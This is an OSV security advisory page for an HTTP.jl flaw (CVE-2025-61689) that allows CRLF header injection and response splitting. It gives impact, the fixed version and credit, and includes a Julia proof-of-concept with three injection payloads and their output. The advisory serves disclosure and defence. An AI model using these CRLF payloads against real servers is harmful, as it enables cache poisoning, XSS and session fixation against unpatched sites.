JLSEC-2025-40

See a problem?
Please try reporting it to the source first.

Source

https://github.com/JuliaLang/SecurityAdvisories.jl/blob/main/advisories/published/2025/JLSEC-2025-40.md

Import Source

https://github.com/JuliaLang/SecurityAdvisories.jl/tree/generated/osv/2025/JLSEC-2025-40.json

JSON Data

https://api.osv.dev/v1/vulns/JLSEC-2025-40

Aliases

CVE-2025-61689
GHSA-h3x8-ppwj-6vcj

Published

2025-10-14T04:37:19.606Z

Modified

2025-11-06T22:57:16.515669Z

Summary

Header injection/Response splitting via header construction.

Details

HTTP.jl did not validate header names/values for illegal characters, allowing CRLF-based header injection and response splitting.

using HTTP, Sockets

function handle_index(req::HTTP.Request)
    @show HTTP.header(req, "X-Foo")
    return HTTP.Response(200, "ok")
end

function handle_redirect(req::HTTP.Request)
    return HTTP.Response(301, ["Location" => get(HTTP.URIs.queryparams(req), "to", "/")], "redirect")
end

const router = HTTP.Router()
HTTP.register!(router, "GET", "/", handle_index)
HTTP.register!(router, "GET", "/redirect", handle_redirect)

server = HTTP.serve!(router, Sockets.IPv4(0,0,0,0), 8080)


println("[*] POC 1: Header injection in request through header key")
user_input = "X-Custom: x\r\nX-Foo: Bar\r\nX-Custom"
HTTP.get("http://localhost:8080/", [user_input => "hello"])

println()

println("[*] POC 2: Header injection in request through header value")
user_input = "hello\r\nX-Foo: Bar"
HTTP.get("http://localhost:8080/", ["X-Custom" => user_input])

println()

println("[*] POC 3: Header injection in response through header value")
res = HTTP.get("http://localhost:8080/redirect?to=/%0d%0aX-Foo:%20Bar", redirect=false)
@show HTTP.header(res, "X-Foo")

Result

[ Info: Listening on: [0.0.0.0:8080](http://0.0.0.0:8080/), thread id: 1
[*] POC 1: Header injection in request through header key
HTTP.header(req, "X-Foo") = "Bar"

[*] POC 2: Header injection in request through header value
HTTP.header(req, "X-Foo") = "Bar"

[*] POC 3: Header injection in response through header value
HTTP.header(res, "X-Foo") = "Bar"

Impact

This enables HTTP response splitting and header injection, leading to cache poisoning, XSS, session fixation, and more.

Patches

This issue is fixed in HTTP.jl v1.10.19

Credit

Chen T

Database specific

{
    "license": "CC-BY-4.0",
    "sources": [
        {
            "published": "2025-10-10T12:51:29Z",
            "url": "https://api.github.com/repos/JuliaWeb/HTTP.jl/security-advisories/GHSA-h3x8-ppwj-6vcj",
            "modified": "2025-10-10T12:51:29Z",
            "html_url": "https://github.com/JuliaWeb/HTTP.jl/security/advisories/GHSA-h3x8-ppwj-6vcj",
            "id": "GHSA-h3x8-ppwj-6vcj",
            "imported": "2025-10-14T02:22:26.408Z"
        }
    ]
}

References

Affected packages

Julia / HTTP

Package

Name: HTTP
Purl: pkg:julia/HTTP?uuid=cd3eb016-35fb-5094-929b-558a96fad6f3

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.10.19

Database specific

source

"https://github.com/JuliaLang/SecurityAdvisories.jl/tree/generated/osv/2025/JLSEC-2025-40.json"